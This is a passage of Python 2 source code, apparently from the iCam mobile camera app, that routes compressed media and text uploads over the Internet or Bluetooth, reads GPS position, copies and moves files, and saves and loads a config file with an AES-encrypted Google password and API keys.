                From PyS60 2.0 documentation: Yields to the active scheduler to
                    have ready active objects with priority above normal
                    scheduled for running. This has the effect of flushing the
                    eventual pending UI events. Note that the UI callback code
                    may be run in the context of the thread that performs an
                    ao_yield. For information on active scheduler, see S60 SDK
                    documentation [4].
                """
                # e32.ao_yield()
                pass
                """
                DebugPrint("InternetUploadBinaryData(): after calling " \
                    "e32.ao_yield().")
                """
            """
            From http://docs.python.org/library/httplib.html:
                "Note that you must have read the whole response before you can
                send a new request to the server."
            But I am not doing this...
            """
            """
            # Get the response.
            # From http://docs.python.org/library/httplib.html:
            #    "Note that you must have read the whole response before you can
            #    send a new request to the server."
            httpResponse = myHTTPConnection.getresponse()
            """
            if HTTP_INTERNET_UPLOAD_FAST == False:
                # Get the response.
                # From http://docs.python.org/library/httplib.html: "Note that
                #    you must have read the whole response before you can send
                #    a new request to the server."
                httpResponse = myHTTPConnection.getresponse()
                """
                I don't really believe this info from 2003 is valid now:
                From http://mail.python.org/pipermail/tutor/2003-May/022635.html:
                    "In order to re-use the connection, before you make the
                    next request, you need to read the data from the last
                    request. Not sure why that is, but thats the way it is.
                    So make sure you do your read.
                    Hope that helps someone else out there."
                """
                httpResponseString = httpResponse.read()
                DebugPrint("InternetUploadBinaryData(): " \
                    "httpResponseString = %s." % httpResponseString)
                # Close the connection.
                myHTTPConnection.close()
            """
            else:
                # Close the connection - I don't like to leave so many
                # connections open... :)
                myHTTPConnection.close()
            """
        except:
            DebugPrintErrorTrace()
            TreatException("InternetUploadBinaryData()")
            res = -1
    # Save data in Unsent.
    if (res == -1) and (saveUnsentPackets > 0):
        SaveUnsentData(dataToUpload, pageOnServer)
    if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2:
        if itIsASeparateThread == False:
            """
            We have one main thread for upload and the other are parallel to
            this one. (Basically, we do this such that if
            numThreadsUpload == 1 we don't spawn any new thread.)
            """
            if numThreadIssued > 0:
                numThreadIssued -= 1
    return res
# Default binding: uploads go through the standard implementation (the
# multithreaded variant can be bound instead; see the mode notes above).
InternetUploadBinaryData = InternetUploadBinaryDataStandard
def AddPacketHeader(rawData, footer=False):
    """Attach the packed device identifier to a raw packet.

    By default the identifier is prepended as a header; with footer=True
    it is appended instead.  IMPORTANT: deviceIdFormat must use "<" to
    specify no alignment (see http://docs.python.org/library/struct.html).
    """
    global deviceId
    packedDeviceId = struct.pack(deviceIdFormat, deviceId)
    if footer:
        return rawData + packedDeviceId
    return packedDeviceId + rawData
# InternetUploadGZippedData() is used to send media files and text messages.
def InternetUploadGZippedData(aDeviceId, uncompressedData, inetServerAddress,
                              pageOnServer):
    """Tag a packet with the device id, zlib-compress it and upload it.

    Returns the result of InternetUploadBinaryData(), or -1 if anything
    (logging, header packing, compression, upload) raises.
    """
    try:
        DebugPrint("Entered InternetUploadGZippedData(%s): accessPointName = %s, " \
                   "pageOnServer = %s, len(uncompressedData) = %d." % \
                   (aDeviceId, accessPointName, pageOnServer,
                   len(uncompressedData)))
        # Prepend the packed device identifier, then compress everything
        # with zlib (Python 2 str.encode codec).
        taggedData = AddPacketHeader(uncompressedData)
        compressedData = taggedData.encode("zlib")
        return InternetUploadBinaryData(compressedData,
                                        inetServerAddress, pageOnServer)
    except:
        DebugPrint("InternetUploadGZippedData exception.")
        DebugPrintErrorTrace()
        return -1
def UploadBinaryData(dataToUpload, inetServerAddress, inetPageOnServer,
                     fileName=None): # fileName is currently used ONLY for media files and FIL?? packets.
    """Dispatch a binary packet to Bluetooth or Internet upload.

    Routing depends on inetPageOnServer (the packet type) and on
    bluetoothMode: mode 2 (BT client) sends over Bluetooth, otherwise the
    packet goes to the Internet server.  For media packets a
    standalone/BT-server phone (mode 0 or 1) first retries its unsent
    files.  Returns the underlying upload function's result.
    """
    global MY_DEBUG_STDOUT, bluetoothMode, accessPointName, \
        bluetoothServerAddress
    PetWatchdog()
    myText = "UploadBinaryData(): len(dataToUpload) = %d (size of data " \
        "packet sent in bytes), inetServerAddress = %s, " \
        "inetPageOnServer = %s, fileName = %s." \
        % (len(dataToUpload), inetServerAddress, inetPageOnServer,
        fileName)
    if inetPageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE:
        # BT client
        if bluetoothMode == 2:
            """
            UploadUnsentFILES() #Attempting to send the unsent media files, as
                well, before sending the current media file.
            """
            myText += "Uploading to the Bluetooth server only."
            DebugPrint(myText)
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            return BluetoothUploadBinaryData(bluetoothServerAddress,
                                             dataToUpload, fileName)
        else:
            """
            It should ALWAYS hold: aDeviceId == deviceId. Impersonating a
            different phone is no longer necessary - I was using this
            before, to relay a message.
            """
            # First condition is to avoid calling very often
            # UploadUnsentFILES() and 2nd is to check if it is the BT server.
            #if (not pathFileName.startswith(LOCAL_FOLDER_UNSENT_FILES) and
            #        bluetoothMode == 1):
            # If the phone is standalone (not BT) or BT server.
            if bluetoothMode == 0 or bluetoothMode == 1:
                # Attempting to send the unsent files, as well, before sending
                # the current data.
                UploadUnsentFILES()
            myText += "Uploading via Internet."
            DebugPrint(myText)
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            res = InternetUploadBinaryData(dataToUpload, inetServerAddress,
                                           inetPageOnServer)
            DebugPrint("UploadBinaryData(): InternetUploadBinaryData " \
                "returned %d." % res)
            return res
    elif inetPageOnServer == WEBPAGE_UL_GZIPPED_TEXT:
        # BT client
        if bluetoothMode == 2:
            """
            Attempting to send the unsent media files, as well, before
            sending the current media file.
            """
            # UploadUnsentFILES()
            return BluetoothUploadBinaryData(bluetoothServerAddress,
                                             dataToUpload, None)
        else:
            return InternetUploadBinaryData(dataToUpload,
                                            inetServerAddress, inetPageOnServer)
    elif inetPageOnServer == WEBPAGE_UL_GZIPPED_FILE:
        # BT client
        if bluetoothMode == 2:
            """
            Attempting to send the unsent media files, as well, before sending
            the current media file.
            """
            # UploadUnsentFILES()
            """
            We only use EXTENSION_ARBITRARY_FILE to specify we upload an
            arbitrary file.
            """
            return BluetoothUploadBinaryData(bluetoothServerAddress,
                                             dataToUpload, EXTENSION_ARBITRARY_FILE)
        else:
            myText += "Uploading via Internet."
            DebugPrint(myText)
            if MY_DEBUG_STDERR:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            return InternetUploadBinaryData(dataToUpload,
                                            inetServerAddress, inetPageOnServer)
"""
Uploads via Internet or Bluetooth, depending on bluetoothMode.
fileName is required for BluetoothUploadGZippedData - on Bluetooth we specify
the type of packet sent via the file name.
The bluetoothServerAddress is global; !!!!inetServerAddress should be made
global, then.
"""
def UploadGZippedData(aDeviceId, uncompressedData, inetServerAddress,
                      inetPageOnServer, fileName=None):
    """Compress-and-upload dispatcher (Bluetooth or Internet).

    Mirrors UploadBinaryData() routing: bluetoothMode == 2 (BT client)
    sends via BluetoothUploadGZippedData(), otherwise via
    InternetUploadGZippedData().  Media packets additionally require a
    configured access point (accessPointName set and no pending
    reconnect) and trigger a retry of unsent files first.  Returns the
    underlying upload function's result (None when a media packet is
    dropped because no AP is available).
    """
    """
    !!!!
    struct.pack()
    UploadBinaryData(aDeviceId, uncompressedData, inetServerAddress,
        inetPageOnServer, fileName)
    """
    global MY_DEBUG_STDOUT, bluetoothMode, accessPointName, \
        bluetoothServerAddress
    #if SYMBIAN_UIQ_OS:
    DebugPrint("Entered UploadGZippedData().")
    PetWatchdog()
    myText = "UploadGZippedData(): len(uncompressedData) = %d, " \
        "inetServerAddress = %s, inetPageOnServer = %s, " \
        "fileName = %s. " % \
        (len(uncompressedData), inetServerAddress,
        inetPageOnServer, fileName)
    if inetPageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE:
        # BT client
        if bluetoothMode == 2:
            """
            Attempting to send the unsent media files, as well, before
            sending the current media file.
            """
            #UploadUnsentFILES()
            myText += "Uploading to the Bluetooth server only."
            DebugPrint(myText)
            if MY_DEBUG_STDERR_2:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            return BluetoothUploadGZippedData(bluetoothServerAddress,
                uncompressedData, fileName, newMode=NEW_BT_FORMAT)
        else:
            if (accessPointName != u"") and (accessPointRetryConnect == False):
                """
                It should ALWAYS hold: aDeviceId == deviceId. Impersonating a
                different phone is no longer necessary - I was using this
                before, to relay a message.
                """
                """
                First condition is to avoid calling very often
                UploadUnsentFILES() and 2nd is to check if it is the
                BT server.
                """
                #if (not pathFileName.startswith(LOCAL_FOLDER_UNSENT_FILES))
                #    and (bluetoothMode == 1):
                # If the phone is standalone (no BT) or BT server:
                if bluetoothMode == 0 or bluetoothMode == 1:
                    """
                    Attempting to send the unsent media files, as well, before
                    sending the current media file.
                    """
                    UploadUnsentFILES()
                myText += "Uploading via Internet."
                DebugPrint(myText)
                if MY_DEBUG_STDERR:
                    sys.stderr.write(myText + "\n")
                    sys.stderr.flush()
                res = InternetUploadGZippedData(aDeviceId, uncompressedData,
                    inetServerAddress, inetPageOnServer)
                DebugPrint("UploadGZippedData(%s): InternetUploadGZippedData " \
                    "returned %d." % (aDeviceId, res))
                return res
    elif inetPageOnServer == WEBPAGE_UL_GZIPPED_TEXT:
        DebugPrint(myText + \
            "Uploading text depending on bluetoothMode=%d." % bluetoothMode)
        # BT client
        if bluetoothMode == 2:
            """
            Attempting to send the unsent media files, as well, before sending
            the current media file.
            # UploadUnsentFILES()
            """
            return BluetoothUploadGZippedData(bluetoothServerAddress,
                uncompressedData, None, newMode=NEW_BT_FORMAT)
        else:
            return InternetUploadGZippedData(aDeviceId,
                uncompressedData, inetServerAddress,
                inetPageOnServer)
    elif inetPageOnServer == WEBPAGE_UL_GZIPPED_FILE:
        # BT client
        if bluetoothMode == 2:
            """
            Attempting to send the unsent media files, as well, before sending
            the current media file.
            """
            # UploadUnsentFILES()
            # We only use EXTENSION_ARBITRARY_FILE to specify we upload an
            # arbitrary file.
            return BluetoothUploadGZippedData(bluetoothServerAddress,
                uncompressedData, EXTENSION_ARBITRARY_FILE)
        else:
            myText += "Uploading via Internet."
            DebugPrint(myText)
            if MY_DEBUG_STDERR_2:
                sys.stderr.write(myText + "\n")
                sys.stderr.flush()
            return InternetUploadGZippedData(aDeviceId,
                uncompressedData, inetServerAddress,
                inetPageOnServer)
def ReadGPSPosition():
    """Refresh the global gpsInfo dict from the PyS60 positioning module.

    When the global readGPS flag is set, queries positioning.position()
    (the first call may block for a long time while the GPS acquires a
    fix) and then replaces any NaN course values with the -1.0 "unknown"
    sentinel.  When readGPS is unset, fills every gpsInfo field with
    neutral 0.0 / -1 placeholder values instead.
    No return value; all results are stored in the global gpsInfo.
    """
    global readGPS
    global gpsInfo
    if readGPS:
        DebugPrint("Entered ReadGPSPosition() - readGPS = %s." % readGPS)
        try:
            DebugPrint("GPS last_position: %s\n" % \
                str(positioning.last_position()) + \
                "Reading current GPS coordinates...")
            """
            From PyS60 doc: Note that the first position()-call may take a long
            time (because of gps technology).
            position(course=0, satellites=0, callback=None,
                interval=positioning.POSITION INTERVAL, partial=0)
            """
            gpsInfo = positioning.position(1, 1)
            DebugPrint("GPS position: %s." % gpsInfo)
        except:
            DebugPrint("ReadGPSPosition(): positioning.last_position() or " \
                "position() returned an exception.")
            DebugPrintErrorTrace()
        appuifw.note(u"Returned from reading current GPS coordinates...",
            "info")
        # NOTE(review): if position() raised above, gpsInfo keeps its
        # previous value; the NaN scrubbing below assumes it is a dict
        # with a "course" entry - confirm gpsInfo is pre-initialized
        # elsewhere in the module.
        if isNaN(gpsInfo["course"]["speed"]):
            gpsInfo["course"]["speed"] = -1.0
        if isNaN(gpsInfo["course"]["heading"]):
            gpsInfo["course"]["heading"] = -1.0
        if isNaN(gpsInfo["course"]["heading_accuracy"]):
            gpsInfo["course"]["heading_accuracy"] = -1.0
        if isNaN(gpsInfo["course"]["speed_accuracy"]):
            gpsInfo["course"]["speed_accuracy"] = -1.0
    else:
        # GPS reading disabled: publish neutral placeholder values.
        gpsInfo["position"]["latitude"] = 0.0
        gpsInfo["position"]["longitude"] = 0.0
        gpsInfo["position"]["altitude"] = 0.0
        gpsInfo["position"]["vertical_accuracy"] = 0.0
        gpsInfo["position"]["horizontal_accuracy"] = 0.0
        gpsInfo["course"]["speed"] = 0.0
        gpsInfo["course"]["heading"] = 0.0
        gpsInfo["course"]["heading_accuracy"] = 0.0
        gpsInfo["course"]["speed_accuracy"] = 0.0
        gpsInfo["satellites"]["horizontal_dop"] = 0.0
        gpsInfo["satellites"]["vertical_dop"] = 0.0
        gpsInfo["satellites"]["time_dop"] = 0.0
        gpsInfo["satellites"]["time"] = 0.0
        gpsInfo["satellites"]["used_satellites"] = -1
        gpsInfo["satellites"]["satellites"] = -1
    #DebugPrint("Exiting ReadGPSPosition()")
def CopyFile(srcPathFileName, dstFileName, myCopyBufferSize=16 * 1024):
    """Copy srcPathFileName to dstFileName in myCopyBufferSize-byte chunks.

    Returns 0 on success, -1 on any error (the error trace is logged via
    DebugPrintErrorTrace and optionally stderr).
    Fix: the original closed the files only on the success path, leaking
    both handles whenever open/read/write raised.
    """
    srcFile = None
    dstFile = None
    try:
        # Nested try so the code also runs on very old Python 2 versions
        # that lack combined try/except/finally.
        try:
            srcFile = open(srcPathFileName, "rb")
            dstFile = open(dstFileName, "wb")
            while True:
                myCopyBuffer = srcFile.read(myCopyBufferSize)
                if not myCopyBuffer:
                    break
                dstFile.write(myCopyBuffer)
        except:
            if MY_DEBUG_STDERR:
                sys.stderr.write("CopyFile(%s, %s, %d): exception.\n" %
                                 (srcPathFileName, dstFileName,
                                  myCopyBufferSize))
            DebugPrintErrorTrace()
            return -1
    finally:
        # Close both handles even when read/write raised.
        for handle in (srcFile, dstFile):
            if handle is not None:
                try:
                    handle.close()
                except:
                    pass
    return 0
def MoveFileBetweenAnyDrives(srcPathFileName, dstPathFileName):
    """Move a file, working across drives/volumes where os.rename cannot.

    Returns 0 on success, -1 on error.  On Symbian a cross-drive move is
    emulated with CopyFile() + os.unlink() (rename cannot cross drives
    there); on the other supported platforms a plain os.rename() is used.
    """
    if ANDROID_OS or WINDOWS_CE_OS_PYTHONCE or WINDOWS_OS or RASPBIAN_OS:
        DebugPrint("Entered MoveFileBetweenAnyDrives().")
        try:
            os.rename(srcPathFileName, dstPathFileName)
        except:
            if MY_DEBUG_STDERR:
                sys.stderr.write("MoveFileBetweenAnyDrives(%s, %s): " \
                    "exception.\n" % \
                    (srcPathFileName, dstPathFileName))
            DebugPrintErrorTrace()
            return -1
    elif SYMBIAN_OS:
        # Compare drive letters ("C:", "D:", ...) of the two paths.
        if srcPathFileName[0:2] != dstPathFileName[0:2]:
            """
            The source and destination drives differ so moving implies copying
            src to dst and deleting src.
            """
            if CopyFile(srcPathFileName, dstPathFileName) == -1:
                return -1
            try:
                os.unlink(srcPathFileName)
            except:
                # NOTE(review): an unlink failure here still falls
                # through to `return 0` (the copy itself succeeded),
                # unlike the rename branches which return -1 - confirm
                # this best-effort behavior is intended.
                if MY_DEBUG_STDERR:
                    sys.stderr.write("MoveFileBetweenAnyDrives(%s, %s): " \
                        "exception.\n" %
                        (srcPathFileName, dstPathFileName))
                DebugPrintErrorTrace()
        else:
            try:
                os.rename(srcPathFileName, dstPathFileName)
            except:
                if MY_DEBUG_STDERR:
                    sys.stderr.write("MoveFileBetweenAnyDrives(%s, %s): " \
                        "exception.\n" %
                        (srcPathFileName, dstPathFileName))
                DebugPrintErrorTrace()
                return -1
    return 0
def RepairGoogleKeywords():
    """Pad the global googleKeywords with '*' up to the minimum length,
    since the Google services raise a "too short" exception on shorter
    keyword strings.
    """
    global googleKeywords
    #!!!!TODO: look for exact minimal length required.
    minimumLength = 15
    shortfall = minimumLength - len(googleKeywords)
    if shortfall > 0:
        googleKeywords = googleKeywords + "*" * shortfall
def StoreLocalConfigInFile():
    """Persist the current settings to LOCAL_CONFIG_PATH_FILENAME.

    Writes, each value preceded by a '# Description:' comment line:
    googleUsername, the AES+base64-encrypted Google password (only when
    googleRememberPassword is set), the upload/server flags,
    googleKeywords and the YouTube / IQ Engines API keys - in exactly
    the order LoadLocalConfigFromFile() reads them back.  Each section
    has its own try/except so later sections are still attempted after
    an earlier failure.
    NOTE(review): if the initial open() fails, the later sections still
    reference fOutput (the NameError is caught by their own except
    blocks) - confirm this best-effort behavior is intended.
    """
    global googleUsername, googleRememberPassword #, googlePassword
    global uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer, \
        googleKeywords, googleMediaPrivate
    DebugPrint("Entered StoreLocalConfigInFile().")
    # Ensure the keywords meet the minimum length before persisting.
    RepairGoogleKeywords()
    if SYMBIAN_OS:
        if SYMBIAN_3:
            """
            We call RedrawHandler() since normally it is invoked very rare on
            S^3 devices (test S^1 devices!!!) - only at the beginning of
            iCam 2-3 times and at Quit().
            """
            RedrawHandler(None)
        else:
            pass
    # The AES cipher used below lives in the gdata package tree.
    if gdataModulesImported == False:
        ImportGdataModules()
    """
    if (not gdataModulesImported):
        return
    """
    try:
        fOutput = open(LOCAL_CONFIG_PATH_FILENAME, "w")
        fOutput.write("# Description: Google username\n")
        fOutput.write(googleUsername + "\n")
    except:
        DebugPrintErrorTrace()
    try:
        myTextNot = "# Description: encrypted Google password - not " \
            "stored\n\n"
        if googleRememberPassword:
            """
            Padding spaces at the end of googlePassword since it needs to be
            multiple of 16 chars long.
            From C:\Python25\Lib\site-packages\gdata\tlslite\utils\AES.py
                assert(len(plaintext) % 16 == 0)
            """
            plainText = GetGooglePassword()
            while len(plainText) % 16 != 0:
                plainText += " "
            # cipher = Python_AES.new(AES_SECRET_KEY, 2, AES_IV)
            cipher = gdata.tlslite.utils.Python_AES.new(AES_SECRET_KEY,
                2, AES_IV)
            if sys.version_info[0 : 2] == (2, 2):
                encodedText = base64.encodestring(cipher.encrypt(plainText))
            else:
                encodedText = base64.b64encode(cipher.encrypt(plainText))
            # clearText
            # At least on Python 2.2 they add an extra "\r\n" to encodedText
            encodedText = encodedText.rstrip("\r\n")
            #print "cipher.encrypt(plainText) = [%s]" % str(cipher.encrypt(plainText))
            #print "encodedText = %s" % str(encodedText)
            fOutput.write("# Description: encrypted Google password\n")
            fOutput.write(encodedText + "\n")
        else:
            fOutput.write(myTextNot)
    except:
        # Keep the file layout stable: write the "not stored" section
        # even when encryption failed.
        fOutput.write(myTextNot)
        DebugPrintErrorTrace()
    try:
        fOutput.write("# Description: uploadMediaToYouTube (0 = False, " \
            "1 = True)\n")
        fOutput.write(str(int(uploadMediaToYouTube)) + "\n")
        fOutput.write("# Description: uploadMediaToPicasa (0 = False, " \
            "1 = True)\n")
        fOutput.write(str(int(uploadMediaToPicasa)) + "\n")
        fOutput.write("# Description: useiCamServer (0 = No, " \
            "1 = No media upload, 2 = All (upload State + Media, download updates and commands)\n")
        fOutput.write(str(int(useiCamServer)) + "\n")
        fOutput.write("# Description: googleRememberPassword (0 = False, " \
            "1 = True)\n")
        fOutput.write(str(int(googleRememberPassword)) + "\n")
        fOutput.write("# Description: googleMediaPrivate (0 = False, " \
            "1 = True)\n")
        fOutput.write(str(int(googleMediaPrivate)) + "\n")
        fOutput.write("# Description: googleKeywords (used for YouTube and " \
            "Picasa)\n")
        fOutput.write(googleKeywords + "\n")
        fOutput.write("# Description: YOUTUBE_TEST_CLIENT_ID\n")
        fOutput.write(YOUTUBE_TEST_CLIENT_ID + "\n")
        fOutput.write("# Description: YouTube developer key\n")
        fOutput.write(youtubeDeveloperKey + "\n")
        fOutput.write("# Description: IQE_KEY\n")
        fOutput.write(IQE_KEY + "\n")
        fOutput.write("# Description: IQE_SECRET\n")
        fOutput.write(IQE_SECRET + "\n")
    except:
        DebugPrintErrorTrace()
    try:
        # fOutput.flush()
        fOutput.close()
    except:
        DebugPrintErrorTrace()
    # NOTE(review): this trailing import looks vestigial - base64 is
    # already used above, so the module must have been imported earlier.
    try:
        import base64
    except:
        DebugPrintErrorTrace()
def GetGooglePassword():
    """Return the plain-text Google password.

    Resolution order:
      1. the cached global googlePassword, when already decrypted;
      2. decrypt the global googlePasswordEncrypted (base64 + AES, as
         written by StoreLocalConfigInFile()) and cache the result;
      3. "" when no encrypted password was loaded.
    Returns None if decryption raises (the trace is logged).
    """
    global googlePasswordEncrypted, googlePassword
    DebugPrint("Entered GetGooglePassword().")
    #print "Entered GetGooglePassword(): googlePassword = %s." % googlePassword
    try:
        if googlePassword is not None:
            return googlePassword
        """
        googlePasswordEncrypted contains the password read from
        LOCAL_CONFIG_PATH_FILENAME
        """
        if googlePasswordEncrypted is None:
            return ""
        else:
            # The AES implementation ships inside the gdata package.
            if gdataModulesImported == False:
                ImportGdataModules()
            """
            I need to reinitialize the Python_AES for decryption because the
            self.IV which is initalized with the 3rd param in new() is
            changed at every Python_AES.encrypt() call, so I need self.IV
            again with the initial value.
            """
            # cipher = Python_AES.new(AES_SECRET_KEY, 2, AES_IV)
            cipher = gdata.tlslite.utils.Python_AES.new(AES_SECRET_KEY,
                2, AES_IV)
            if sys.version_info[0 : 2] == (2, 2):
                googlePasswordAux = \
                    cipher.decrypt(base64.decodestring(googlePasswordEncrypted))
                #googlePasswordAux = googlePasswordAux.tostring().rstrip()
            else:
                googlePasswordAux = \
                    cipher.decrypt(base64.b64decode(googlePasswordEncrypted))
            #print "decodedText = %s" % decodedText
            """
            We remove the added spaces at the end of the password which made it
            have length % 16 == 0.
            Funny: if we leave the password with trailing spaces
            gdata + youtube don't complain and it logs in.
            """
            googlePasswordAux = googlePasswordAux.rstrip()
            if False:
            #if True:
                DebugPrint("LoadLocalConfigFromFile(): " \
                    "googlePasswordAux = %s." % googlePasswordAux)
            # Cache the decrypted password for subsequent calls.
            googlePassword = googlePasswordAux
            #return googlePasswordAux.rstrip()
            return googlePassword
    except:
        DebugPrintErrorTrace()
# NOTE(review): presumably flipped to True once the persisted application
# state has been loaded - confirm against the (not shown) state-loading code.
stateLoaded = False
def LoadLocalConfigFromFile(pathFileName):
    """Load persisted settings from pathFileName into module globals.

    The file is the one written by StoreLocalConfigInFile(): one value
    per line, each preceded by a '# Description:' comment line, read in
    this fixed order: googleUsername, googlePasswordEncrypted,
    uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
    googleRememberPassword, googleMediaPrivate, googleKeywords,
    YOUTUBE_TEST_CLIENT_ID, youtubeDeveloperKey, IQE_KEY, IQE_SECRET.
    A missing file only logs a message; a truncated file stops early,
    leaving the remaining globals at their previous values.
    NOTE(review): the early returns on truncated input skip
    fInput.close() - harmless on CPython, but worth tidying.
    """
    # global googleUsername, googlePassword, googleRememberPassword
    # global uploadMediaToYouTube, uploadMediaToPicasa, googleKeywords
    # global googleMediaPrivate
    global googleUsername, googlePasswordEncrypted, \
        googleRememberPassword
    global uploadMediaToYouTube, uploadMediaToPicasa, \
        useiCamServer, googleMediaPrivate, googleKeywords
    #global saveUnsentPackets
    #global internetUploadMaxErrors
    global YOUTUBE_TEST_CLIENT_ID, youtubeDeveloperKey
    global IQE_KEY, IQE_SECRET
    DebugPrint("Entered LoadLocalConfigFromFile()")
    """
    if not gdataModulesImported:
        return
    """
    def ReadNextNonCommentLine(fInput, rstripStr=None):
        # Return the next line not starting with '#', right-stripped
        # with rstrip(rstripStr); None on EOF or exception.
        try:
            #!!!!TODO: we can do also: for fLine in fInput:
            while True:
                fLine = fInput.readline()
                # Note that an empty line before EOF still has at least \n
                if fLine:
                    fLine = fLine.rstrip(rstripStr)
                else:
                    return None
                #if not fLine.startswith("# Description:"):
                if not fLine.startswith("#"):
                    return fLine
        except:
            DebugPrintErrorTrace()
    try:
        if os.path.isfile(pathFileName):
            fInput = open(pathFileName, "r")
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            googleUsername = fLine.rstrip()
            # The password line is stripped of line terminators only
            # (explicit "\r\n"), not of all trailing whitespace.
            fLine = ReadNextNonCommentLine(fInput, "\r\n")
            if fLine is None:
                return
            googlePasswordEncrypted = fLine
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            uploadMediaToYouTube = fLine
            uploadMediaToYouTube = int(uploadMediaToYouTube)
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            uploadMediaToPicasa = fLine
            uploadMediaToPicasa = int(uploadMediaToPicasa)
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            useiCamServer = fLine
            useiCamServer = int(useiCamServer)
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            googleRememberPassword = fLine
            googleRememberPassword = int(googleRememberPassword)
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            googleMediaPrivate = fLine
            googleMediaPrivate = int(googleMediaPrivate)
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            googleKeywords = fLine
            # Re-pad the keywords in case the stored value is too short.
            RepairGoogleKeywords()
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            YOUTUBE_TEST_CLIENT_ID = fLine
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            youtubeDeveloperKey = fLine
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            IQE_KEY = fLine
            fLine = ReadNextNonCommentLine(fInput)
            if fLine is None:
                return
            IQE_SECRET = fLine
            # fInput.flush()
            fInput.close()
        else:
            DebugPrint("LoadLocalConfigFromFile(): could not find file %s." % \
                pathFileName)
    except:
        DebugPrintErrorTrace()
    if MY_DEBUG_STDOUT:
        try:
            print "LoadLocalConfigFromFile(): read the following:"
            print "    googleUsername =", googleUsername
            #print "    googlePassword =", googlePassword
            print "    googleRememberPassword =", googleRememberPassword
            print "    uploadMediaToYouTube =", uploadMediaToYouTube
            print "    uploadMediaToPicasa =", uploadMediaToPicasa
            if useiCamServer == 0:
                myText = "no data"
            elif useiCamServer == 1:
                myText = "only state"
            elif useiCamServer == 2:
                myText = "all state and media data"
            print "    useiCamServer = %d (%s to iCam server)" % (useiCamServer, myText)
            print "    googleMediaPrivate =", googleMediaPrivate
            print "    googleKeywords =", googleKeywords
            print "    YOUTUBE_TEST_CLIENT_ID =", YOUTUBE_TEST_CLIENT_ID
            print "    youtubeDeveloperKey =", youtubeDeveloperKey
            print "    IQE_KEY =", IQE_KEY
            print "    IQE_SECRET =", IQE_SECRET
            sys.stdout.flush()
        except:
            DebugPrintErrorTrace()
# Platform-specific path of the watchdog "petting" marker file;
# PetWatchdog() recreates it whenever it is missing.
if ANDROID_OS:
    PETTING_FILENAME = "/sdcard/iCamAlive"
elif UNIX_OS:
    PETTING_FILENAME = "./iCamAlive"
elif SYMBIAN_OS:
    PETTING_FILENAME = "D:/iCamAlive"
elif iOS_PYOBJC:
    PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
elif WINDOWS_OS:
    PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
elif WINDOWS_CE_OS_PYTHONCE:
    PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
elif RASPBIAN_OS:
    PETTING_FILENAME = LOCAL_FOLDER + "/iCamAlive"
def PetWatchdog():
    """Signal liveness by (re)creating the PETTING_FILENAME marker file
    when it is missing; presumably an external watchdog deletes/checks
    it (TODO confirm the consumer).

    Original notes: another idea: check modif time of STATE_PATH_FILENAME
    if always updating it in UploadStateAndFileAndStoreState() - this
    actually happens only for fileName is None.  Maybe save file in
    LOCAL_FOLDER.
    """
    if ANDROID_OS:
        pass
    elif SYMBIAN_S60_OS:
    # elif SYMBIAN_OS:
        """
        On PyUIQ 0.2 it seems executing e32.ao_yield() makes Python crash with
        error - maybe because I don't have a Canvas set? !!!!:
            Program Python
            Reason code LDR-IMPORT
            Reason number 2
        and then:
            Program Py_246948292
            Reason code KERN-EXEC
            Reason number 0
        """
        # Yield to the Symbian active scheduler so pending events run.
        e32.ao_yield()
    if MY_DEBUG_STDOUT:
        print "Entered PetWatchdog() at %s." % \
            GetCurrentDateTimeStringNice()
        if conserveEnergy == False:
            sys.stdout.flush()
    try:
        # if not os.path.exists(PETTING_FILENAME):
        if not os.path.isfile(PETTING_FILENAME):
            # Creating an empty file is enough; only its existence matters.
            fOutput = open(PETTING_FILENAME, "wb")
            # fOutput.write()
            fOutput.close()
    except:
        DebugPrintErrorTrace()
# Optional dependency: pyiqe is the IQ Engines image-recognition API
# client; hasPyIQE gates IQEnginesPhotoUpload() below.
try:
    import pyiqe
    hasPyIQE = True
except:
    hasPyIQE = False
    DebugPrintErrorTrace()
def IQEnginesPhotoUpload(photoPathFileName):
    """Upload a photo to the IQ Engines recognition API and show its tags.

    Sends the image at photoPathFileName via the pyiqe Api, waits for the
    recognition results (update() plus a fixed sleep and a manual
    result() poll) and displays the labels through DisplayNote().
    Returns silently when pyiqe is unavailable or the API reports an
    error; all exceptions are logged.
    """
    if hasPyIQE == False:
        return
    try:
        # From readme.md
        iqe = pyiqe.Api(IQE_KEY, IQE_SECRET)
        # Alex commented this
        # iqe = Api(version="1.2")
        DebugPrint("IQEnginesPhotoUpload(): Time before query: %s." % \
            GetCurrentDateTimeStringWithMilliseconds())
        # "C:/OpenCV2.2/samples/python/1Good/snap00027_bla.bmp"
        (response, qid) = iqe.query(photoPathFileName)
        DebugPrint("IQEnginesPhotoUpload(): Time after query: %s. " \
            "response = %s." % \
            (GetCurrentDateTimeStringWithMilliseconds(),
            str(response)))
        """
        From http://developer.iqengines.com/apidoc/current/faqs/index.html#what-is-the-crowdsourcing-api
            Can you recognize multiple objects?
            Yes! We return by default the strongest match only.
            If you would like to retrieve all objects that are identified in your
            images, you can pass the multiple_results paramter in your
            Query API request.
        """
        DebugPrint("IQEnginesPhotoUpload(): sending query with qid %s." % \
            str(qid))
        #assert response == {'data': {'error': 0}},
        #    "Invalid Response while querying: \n%s " % response
